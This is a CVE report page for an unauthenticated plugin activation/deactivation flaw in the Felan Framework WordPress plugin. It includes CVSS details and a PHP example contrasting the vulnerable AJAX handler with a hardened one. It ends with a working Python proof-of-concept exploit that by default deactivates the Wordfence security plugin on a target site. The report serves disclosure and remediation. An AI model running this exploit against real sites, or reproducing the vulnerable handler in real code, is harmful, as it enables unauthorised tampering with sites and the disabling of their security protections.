Security Vulnerability Report
CVE-2025-10849 CVSS 5.3 MEDIUM

CVE-2025-10849

Published: 2025-10-16 07:15:33
Last Modified: 2026-04-15 00:35:42

Description

The Felan Framework plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'process_plugin_actions' function called via an AJAX action in versions up to, and including, 1.1.4. This makes it possible for unauthenticated attackers to activate or deactivate arbitrary plugins.
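The root cause described above is a CWE-862 pattern: an AJAX handler that performs a privileged operation without checking whether the caller is allowed to perform it. The following PHP is an added illustration, not the Felan Framework's own code; the function names, hook names and request parameter names are assumptions. It places the vulnerable shape beside the hardened form a WordPress plugin handler should take.

```php
<?php
// Added illustration (hypothetical names, not the Felan Framework's code).
// Both handlers are assumed to run inside wp-admin/admin-ajax.php, which loads
// the plugin API (activate_plugin, deactivate_plugins, get_plugins).
require_once ABSPATH . 'wp-admin/includes/plugin.php';

// --- Vulnerable shape: reachable without a session, no authorization ----------
function felan_process_plugin_actions_vulnerable() {
    $plugin = isset( $_POST['plugin'] ) ? sanitize_text_field( wp_unslash( $_POST['plugin'] ) ) : '';
    $action = isset( $_POST['plugin_action'] ) ? sanitize_key( $_POST['plugin_action'] ) : '';
    if ( 'activate' === $action ) {
        activate_plugin( $plugin );       // privileged call, nobody checked who asked
    } elseif ( 'deactivate' === $action ) {
        deactivate_plugins( $plugin );
    }
    wp_send_json_success();
}
// The wp_ajax_nopriv_ registration is what exposes the handler to anonymous callers.
add_action( 'wp_ajax_nopriv_process_plugin_actions', 'felan_process_plugin_actions_vulnerable' );
add_action( 'wp_ajax_process_plugin_actions', 'felan_process_plugin_actions_vulnerable' );

// --- Hardened shape: authenticated hook only, capability and nonce checked ----
function felan_process_plugin_actions_hardened() {
    // 1. Authorization: only users who may manage plugins get any further.
    if ( ! current_user_can( 'activate_plugins' ) ) {
        wp_send_json_error( 'forbidden', 403 );   // exits
    }
    // 2. CSRF protection: the request must carry a nonce minted for this action.
    check_ajax_referer( 'felan_plugin_actions', 'nonce' );

    $plugin = isset( $_POST['plugin'] ) ? sanitize_text_field( wp_unslash( $_POST['plugin'] ) ) : '';
    $action = isset( $_POST['plugin_action'] ) ? sanitize_key( $_POST['plugin_action'] ) : '';

    // 3. Only act on plugin files WordPress itself knows about.
    if ( ! array_key_exists( $plugin, get_plugins() ) ) {
        wp_send_json_error( 'unknown plugin', 400 );
    }
    if ( 'activate' === $action ) {
        $result = activate_plugin( $plugin );
        if ( is_wp_error( $result ) ) {
            wp_send_json_error( $result->get_error_message(), 500 );
        }
    } elseif ( 'deactivate' === $action ) {
        deactivate_plugins( $plugin );
    } else {
        wp_send_json_error( 'unsupported action', 400 );
    }
    wp_send_json_success();
}
// No wp_ajax_nopriv_ hook: admin-ajax.php answers anonymous callers with "0" instead.
add_action( 'wp_ajax_process_plugin_actions', 'felan_process_plugin_actions_hardened' );
```

Note that the nonce alone is not an authorization control; the `current_user_can()` check is the one that closes the missing-capability gap, and the absent `wp_ajax_nopriv_` hook removes the unauthenticated reach entirely.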

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Felan Framework <= 1.1.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-10849 - Felan Framework Plugin Unauthorized Plugin Activation PoC

This PoC demonstrates how an unauthenticated attacker can activate or deactivate
arbitrary plugins on a WordPress site running vulnerable Felan Framework plugin (<= 1.1.4).
"""
import requests
import sys
import argparse


def exploit(target_url, action, plugin_path):
    """
    Exploit CVE-2025-10849 by calling the process_plugin_actions AJAX endpoint.

    :param target_url: Target WordPress site URL (e.g., http://example.com)
    :param action: Plugin action to perform ('activate' or 'deactivate')
    :param plugin_path: Plugin path (e.g., 'akismet/akismet.php')
    """
    ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"

    # Build the payload for the AJAX action
    # The 'process_plugin_actions' handler does not check user capabilities
    payload = {
        "action": "process_plugin_actions",
        "plugin_action": action,
        "plugin": plugin_path,
    }

    print(f"[*] Target: {target_url}")
    print(f"[*] AJAX Endpoint: {ajax_url}")
    print(f"[*] Action: {action} plugin '{plugin_path}'")

    try:
        # Send the unauthenticated POST request
        response = requests.post(ajax_url, data=payload, timeout=10)
        print(f"[*] HTTP Status: {response.status_code}")
        print(f"[*] Response Body: {response.text[:500]}")

        # Check for typical success/failure indicators
        if response.status_code == 200:
            if ("success" in response.text.lower()
                    or response.text.strip() == "0"
                    or response.text.strip() == "1"):
                print(f"[+] Exploit may have succeeded! Plugin '{plugin_path}' {action}d.")
            else:
                print("[-] Response received but exploit status unclear.")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        return None


if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="CVE-2025-10849 - Felan Framework Unauthorized Plugin Activation"
    )
    parser.add_argument(
        "-u", "--url", required=True,
        help="Target WordPress site URL (e.g., http://example.com)"
    )
    parser.add_argument(
        "-a", "--action", choices=["activate", "deactivate"], default="deactivate",
        help="Plugin action to perform (default: deactivate)"
    )
    parser.add_argument(
        "-p", "--plugin", default="wordfence/wordfence.php",
        help="Target plugin path (default: wordfence/wordfence.php)"
    )
    args = parser.parse_args()
    exploit(args.url, args.action, args.plugin)
```

Weakness

CWE-862 (Missing Authorization)

References

https://themeforest.net/item/felan-freelance-marketplace-and-job-board-wordpress-theme/53612955
https://www.wordfence.com/threat-intel/vulnerabilities/id/c5abd601-132a-4d8b-bfcc-afd5c6ed9947?source=cve